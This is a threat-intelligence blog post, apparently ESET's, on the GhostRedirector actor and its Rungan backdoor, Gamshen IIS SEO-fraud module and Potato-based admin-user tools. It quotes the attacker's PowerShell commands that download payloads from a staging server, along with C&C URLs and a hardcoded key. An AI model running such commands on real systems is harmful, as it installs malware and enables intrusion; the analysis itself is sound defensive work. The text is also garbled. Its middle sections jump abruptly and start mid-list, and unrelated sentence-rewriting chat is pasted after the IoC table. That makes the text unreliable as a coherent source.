Backdoors with a side of Potatoes

ESET researchers have identified a new threat actor, whom we have named GhostRedirector, that compromised at least 65 Windows servers mainly in Brazil, Thailand, and Vietnam. GhostRedirector used two previously undocumented, custom tools: a passive C++ backdoor that we named Rungan, and a malicious Internet Information Services (IIS) module that we named Gamshen.

While Rungan has the capability of executing commands on a compromised server, the purpose of Gamshen is to provide SEO fraud as-a-service, i.e., to manipulate search engine results, boosting the page ranking of a configured target website. Even though Gamshen only modifies the response when the request comes from Googlebot – i.e., it does not serve malicious content or otherwise affect regular visitors of the websites – participation in the SEO fraud scheme can hurt the compromised host website reputation by associating it with shady SEO techniques and the boosted websites.

Interestingly, Gamshen is implemented as a native IIS module – IIS (Internet Information Services) is Microsoft’s Windows web server software, which has a modular architecture supporting two types of extensions: native (C++ DLL) and managed (.NET assembly). There are different types of malware that can abuse this technology; our 2021 white paper Anatomy of native IIS malware provides a deep insight into the types of native IIS threats and their architecture. Gamshen falls under the category of a trojan with the main goal of facilitating SEO fraud, similar to IISerpent, which we documented previously.

Besides Rungan and Gamshen, GhostRedirector also uses a series of other custom tools, as well as the publicly known exploits EfsPotato and BadPotato, to create a privileged user on the server that can be used to download and execute other malicious components with higher privileges, or used as a fallback in case the Rungan backdoor or other malicious tools are removed from the compromised server. We believe with medium confidence that a China-aligned threat actor was behind these attacks. In this blogpost we provide insight into the GhostRedirector arsenal used to compromise its victims.

Key points of this blogpost:

  • We observed at least 65 Windows servers compromised in June 2025.
  • Victims are mainly located in Brazil, Thailand, and Vietnam.
  • Victims are not related to one specific sector but to a variety such as insurance, healthcare, retail, transportation, technology, and education.
  • GhostRedirector has developed a new C++ backdoor, Rungan, capable of executing commands on the victim’s server.
  • GhostRedirector has developed a malicious native IIS module, Gamshen, that can perform SEO fraud; we believe its purpose is to artificially promote various gambling websites.
  • GhostRedirector relies on public exploits such as BadPotato or EfsPotato for privilege escalation on compromised servers.
  • Based on various factors, we conclude with medium confidence that a previously unknown, China-aligned threat actor was behind these attacks. We have named it GhostRedirector.

Attribution

We haven’t been able to attribute this attack to any known group; thus we coined the new name GhostRedirector, to cluster all activities documented in this blogpost. These activities started in December of 2024, but we were able to discover other related samples that lead us believe that GhostRedirector has been active since at least August 2024.

GhostRedirector has an arsenal that includes the passive C++ backdoor Rungan, the malicious IIS trojan Gamshen, and a variety of other utilities. We have clustered these tools together by:

  • Their presence on the same compromised server within the same timeframe,
  • A shared staging server, and
  • Similarities in the PDB paths of various GhostRedirector tools, as explained below.

We believe with medium confidence that GhostRedirector is a China-aligned threat actor, based on the following factors:

  • Multiple samples of GhostRedirector tools have hardcoded Chinese strings,
  • A code-signing certificate issued to a Chinese company was used in the attack, and
  • One of the passwords for GhostRedirector-created users on the compromised server contains the word huang, which is Chinese for yellow.

GhostRedirector is not the first known case of a China-aligned threat actor engaging in SEO fraud via malicious IIS modules. Last year, Cisco Talos published a blogpost about a China-aligned threat actor called DragonRank that conducts SEO fraud. There is some overlap in the victim geolocation (Thailand, India, and the Netherlands) and sectors (healthcare, transportation, and IT) in both attacks. However, it is likely that these were opportunistic attacks, exploiting as many vulnerable servers as possible, rather than targeting a specific set of entities. Besides these similarities, we don’t have any reason to believe that DragonRank and GhostRedirector are linked, so we track these activities separately.

Victimology

Figure 1 shows a heatmap of the affected countries, combining data from two sources:

  • ESET telemetry, where we detected these attacks between December 2024 and April 2025, and
  • Our internet-wide scan from June 2025 that we ran to get a better understanding of the scale of the attack, and that allowed us to identify additional victims.

We notified all the victims that we identified through our internet scan about the compromise.

Figure 1 - Countries where victims were detected
Figure 1. Countries where victims were detected

With all the collected information, we found that at least 65 Windows servers were compromised worldwide. Most of the affected servers are in Brazil, Peru, Thailand, Vietnam, and the USA. Note that most of the compromised servers located in the USA appear to have been rented to companies that are based in countries from the previous list. We believe that GhostRedirector was more interested in targeting victims in South America and South Asia.

Also, we observed a small number of cases in:

  • Canada,
  • Finland,
  • India,
  • The Netherlands,
  • The Philippines, and
  • Singapore.

GhostRedirector doesn’t seem to be interested in a particular vertical or sector; we have seen victims in sectors such as education, healthcare, insurance, transportation, technology, and retail.

Initial access

Based on ESET telemetry, we believe that GhostRedirector gains initial access to its victims by exploiting a vulnerability, probably an SQL Injection. Then it uses PowerShell to download various malicious tools – all from the same staging server, 868id[.]com.

In certain instances, attackers have been observed utilizing a different LOLBin, CertUtil, for the same purpose.

This observation is reinforced by the fact that most unauthorized PowerShell executions stemmed from the binary sqlserver.exe, which houses a stored procedure xp_cmdshell that allows for command execution on a system.

The following commands were identified as being executed on the compromised servers:

  • cmd.exe /d /s /c ” powershell curl https://xzs.868id[.]com/EfsNetAutoUser_br.exe -OutFile C:\ProgramData\EfsNetAutoUser_br.exe”
  • cmd.exe /d /s /c ” powershell curl http://xz.868id[.]com/EfsPotato_sign.exe -OutFile C:\ProgramData\EfsPotato_sign.exe”
  • cmd.exe /d /s /c “powershell curl https://xzs.868id[.]com/link.exe -OutFile C:\ProgramData\link.exe”
  • powershell curl https://xzs.868id[.]com/iis/br/ManagedEngine64_v2.dll -OutFile C:\ProgramData\Microsoft\DRM\log\ManagedEngine64.dll
  • powershell curl https://xzs.868id[.]com/iis/IISAgentDLL.dll -OutFile C:\ProgramData\Microsoft\DRM\log\miniscreen.dll

Additionally, GhostRedirector was found to install GoToHTTP on the compromised web server after downloading it from the same staging server. GoToHTTP is a harmless tool that facilitates remote connections accessible from a browser.

GhostRedirector utilized the directory C:\ProgramData\ for its malware installation, specifically using C:\ProgramData\Microsoft\DRM\log for the C++ backdoor and the IIS trojan.

Overview of the Attack

A depiction of the attack can be seen in Figure 2. Attackers compromise a Windows server, download and execute various malicious tools such as a privilege escalation tool, malware dropping multiple webshells, the passive C++ backdoor Rungan, or the IIS trojan Gamshen. The privilege escalation tools are intended to establish a privileged user in the Administrators group, enabling GhostRedirector to carry out privileged operations or serve as a backup in case access to the compromised server is lost.

 

ghostredirector-figure 2
Figure 2. Attack overview

Pernicious Potatoes executing Privilege Escalation

As part of its arsenal, GhostRedirector developed several tools leveraging the local privilege escalation (LPE) tactic, likely based on public EfsPotato and BadPotato exploits. Most analyzed samples were obfuscated with .NET Reactor, featuring multiple obfuscation layers. Some samples were legitimately signed with a code-signing certificate issued by TrustAsia RSA Code Signing CA G3 to 深圳市迪元素科技有限公司 (Shenzhen Diyuan Technology Co., Ltd.) with a thumbprint of BE2AC4A5156DBD9FFA7A9F053F8FA4AF5885BE3C.

The primary objective of these samples was to create or modify a user account on the compromised server and include it in the Administrators group.

During analysis, the following usernames were extracted from the analyzed samples, utilized in creating these malicious administrator users:

  • MysqlServiceEx
  • MysqlServiceEx2
  • Admin

Figure 3 displays the decompiled code used by these samples to create a user post successful LPE exploitation. The password has been redacted for security purposes.

Figure 3 - Portion of decompiled code that creates a new user on a victim server
Figure 3. Portion of decompiled code that creates a new user on a victim server

As depicted in Figure 3, these privilege escalation tools employ a custom C# class named CUserHelper. This class is implemented in a DLL named Common.Global.DLL (SHA-1: 049C343A9DAAF3A93756562ED73375082192F5A8), referred to as Comdai, embedded in the analyzed samples. It is believed that Comdai was developed by the same individuals behind the GhostRedirector arsenal, given the shared pattern in their respective PDB paths – the repeated x5 substring as indicated in Table 1, common to Rungan, Gamshen, and the privilege escalation tools.

Table 1. PDB strings collected from GhostRedirector tools

Sample SHA1 Sample type PDBs
049C343A9DAAF3A93756562ED73375082192F5A8 Comdai library F:\x5\netTools\oMain\Common.Global\obj\Release\Common.Global.pdb
28140A5A29EBA098BC6215DDAC8E56EACBB29B69 Rungan, C++ backdoor F:\x5\AvoidRandomKill-main\x64\Release\IISAgentDLL.pdb
871A4DF66A8BAC3E640B2D1C0AFC075BB3761954 Gamshen, IIS trojan F:\x5\AvoidRandomKill-main\Release\ManagedEngine64.pdb
371818BDC20669DF3CA44BE758200872D583A3B8 Tool to create a new user E:\x5\netTools\WinSystem\obj\Release\uedit32_sign.pdb

Table 2 offers an outline of the significant classes implemented in Comdai used by GhostRedirector’s diverse privilege escalation tools, along with descriptions of the class behaviors. Noteworthy is the ExeHelper class, enabling execution of a file named link.exe – the same filename employed by GhostRedirector to deploy the GoToHTTP tool.

Also of note are the backdoor-like capabilities encompassing network communication, file execution, directory listing, and manipulation of services and Windows registry keys. While these methods have not been observed being utilized by any known GhostRedirector components, it illustrates that Comdai is a versatile tool capable of supporting various stages of an attack.

Table 2. Classes implemented in Comdai

C# class Description
AES Encrypts/Decrypts AES in ECB mode.
Key: 030201090405060708091011121315
CUserHelper Lists users on a compromised server.
Creates a user with specified credentials and adds it into a group name also specified by an argument; by default it uses the Administrators group.
ExeHelper Used to execute a binary named link.exe. The attackers used the name “HttpHelper” for the GoToHTTP binary. The IV and key 030201090405060708090A0B0C0D0E0F are used by GhostRedirector, which is believed to reuse the AES implementation from the AvoidRandomKill repository based on the malware’s PDB path F:\x5\AvoidRandomKill-main\x64\Release\IISAgentDLL.pdb.

The main function of this backdoor is to register a plaintext hardcoded URL http://+:80/v1.0/8888/sys.html into the compromised server, bypassing IIS by exploiting the HTTP Server API. It then waits for a request matching that URL, parses it, and executes the commands received on the compromised server.

Additional URLs can be configured in a file named C:\Windows\Microsoft.NET\Framework64\v2.0.50727\1033\vbskui.dll. Rungan listens to incoming requests matching the specified patterns, which can be updated through a backdoor command. To activate the backdoor, incoming HTTP requests must contain specific parameters and values hardcoded in Rungan.

Upon meeting the activation criteria, Rungan uses the action parameter to determine the command, with the HTTP request body providing the command parameters. The C&C protocol does not use encryption or encoding. Notable capabilities include creating a new user and executing commands on the victim’s server, with a full list of commands detailed in Table 3. This is likely to prevent any disruption of the UI functionality.

  • The URL must contain the string android_ or match one of the following regular expressions:

    [/]?(android|plays|articles|details|iosapp|topnews|joga)_([0-9_]6,20)(/|\\.\\w+)?

    [/]?(android|plays|articles|details|iosapp|topnews|joga)_([a-zA-Z0-9_]6,8)\\/([a-zA-Z0-9_]6,20)(/|\\.\\w+)?

    [/]?(android|plays|articles|details|iosapp|topnews|joga)\\/([0-9_]6,20)(/|\\.\\w+)?

    [/]?(android|plays|articles|details|iosapp|topnews|joga)\\/([a-zA-Z]8,10)(/|\\.\\w+)?

    [/]?([a-zA-Z0-9]6,8)\\/([a-zA-Z0-9]6,8)(/|\\.phtml|\\.xhtml|\\.phtm|\\.shtml)

    [/]?([a-zA-Z0-9_]14)(/|\\.html|\\.htm)

    [/]?([a-zA-Z0-9]6)\\/([a-zA-Z0-9]8)(/|\\.html|\\.htm)

    [/]?([a-z0-9]6)\\.xhtml

  • Secondly, Gamshen alters the response intended for the search engine crawler by obtaining data from its C&C server, brproxy.868id[.]com. Three URLs are observed for this purpose:

    • https://brproxy.868id[.]com/index_base64.php?<ORIGINAL_URL>
    • https://brproxy.868id[.]com/tz_base64.php?<ORIGINAL_URL>
    • https://brproxy.868id[.]com/url/index_base64.php

    In all instances, a hardcoded User-Agent string is utilized: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html). An encoded response is anticipated, decoded, and injected into the HTTP response for the search engine crawler.

    Lastly, before sending out the HTTP response, the OnSendResponse event handler checks the response for crawler requests. If the response indicates a 404 HTTP status code, indicating failure to retrieve malicious data from the C&C server, a redirect is made to another C&C server: http://gobr.868id[.]com/tz.php.

    Although responses from brproxy.868id[.]com or gobr.868id[.]com were not obtained, it is believed that the data supports dubious SEO techniques, such as keyword manipulation and inserting malicious backlinks, or influencing search engine results through redirection to a third-party site, thus contaminating the search index.

    Pivoting on these domains on VirusTotal revealed related images, promoting a gambling application for Portuguese-speaking users. This website appears to benefit from the SEO fraud scheme enabled by the malicious IIS module, suggesting Gamshen aims to compromise numerous websites to drive traffic to this third-party site.

    Images potentially used by GhostRedirector in its SEO fraud scheme are depicted in Figure 8 and Figure 9.

    Figure 8 - A gambling website likely benefiting from the SEO fraud scheme
    Figure 8. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Benefits and privileges for VIP members)
    Figure 9 - A gambling website likely benefiting from the SEO fraud scheme
    Figure 9. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Large deposits and withdrawals without worries)

    Conclusion

    This blogpost introduced GhostRedirector, a previously unknown threat actor aligned with China, and its toolkit for compromising and exploiting Windows servers. In addition to enabling remote command execution on compromised servers, GhostRedirector deploys Gamshen, a malicious IIS module designed to manipulate Google search results through questionable SEO tactics. Gamshen leverages the credibility of compromised websites to promote a third-party gambling site, potentially involved in an SEO fraud scheme as a paying client.

    GhostRedirector showcases persistence and operational resilience by deploying multiple remote access tools and creating unauthorized user accounts on compromised servers to maintain long-term access to the affected infrastructure.

    For mitigation recommendations, refer to our detailed white paper. For inquiries or sample submissions related to this topic, contact us at threatintel@eset.com.

    IoCs

    For a comprehensive list of indicators of compromise (IoCs) and samples, visit our GitHub repository.

    Files

    SHA-1 Filename Detection Description
    EE22BA5453ED577F8664CA390EB311D067E47786 SitePut.exe MSIL/Agent.FEZ Zunput, information collector and webshell installer.
    677B3F9D780BE184528DE5967936693584D9769A EfsNetAutoUser.exe MSIL/HackTool.Agent.QJ A custom tool using the EfsPotato exploit to create a new user on the compromised server.
    5D4D7C96A9E302053BDFAF2449F9A2AB3C806E63 NetAutoUser.exe MSIL/AddUser.S A custom tool using the BadPotato exploit to create a new user on the compromised server.
    28140A5A29EBA098BC6215DDAC8E56EACBB29B69 miniscreen.dll Win64/Agent.ELA Rungan, a passive C++ backdoor.
    371818BDC20669DF3CA44BE758200872D583A3B8 auto.exe Generik.KJWBIPC A tool to create a new user on the compromised server.
    9DD282184DDFA796204C1D90A46CAA117F46C8E1 auto_sign.exe MSIL/Agent.XQL A tool to create a new user or deploy webshells on the compromised server.
    87F354EAA1A6ED5AE51C4B1A1A801B6CF818DAFC EfsNetAutoUser.exe MSIL/HackTool.Agent.QJ A custom tool using the EfsPotato exploit to create a new user on the compromised server.
    5A01981D3F31AF47614E51E6C216BED70D921D60 DotNet4.5.exe MSIL/AddUser.S Custom tool using BadPotato exploit to elevate privileges of an existing user.
    6EBD7498FC3B744CED371C379BA537077DD97036 NetAUtoUser_sign.exe MSIL/AddUser.S Custom tool using BadPotato exploit to elevated privileges of an existing user.
    0EE926E29874324E52DE816B74B12069529BB556 link.exe Win64/RemoteAdmin.GotoHTTP.

    Please rewrite the sentence for me. Rewrite the following sentence:

    Original: “The teacher explained the lesson in a clear and concise manner.”

    Rewritten: “The lesson was explained by the teacher in a clear and concise way.” Can you rewrite the sentence you provided? Please provide more context or specific information for me to rewrite. Please rephrase the following sentence:

    “The company’s quarterly earnings surpassed analysts’ expectations.”

    “The company’s quarterly profits exceeded what analysts had predicted.”

    Leave a Reply

    Your email address will not be published. Required fields are marked *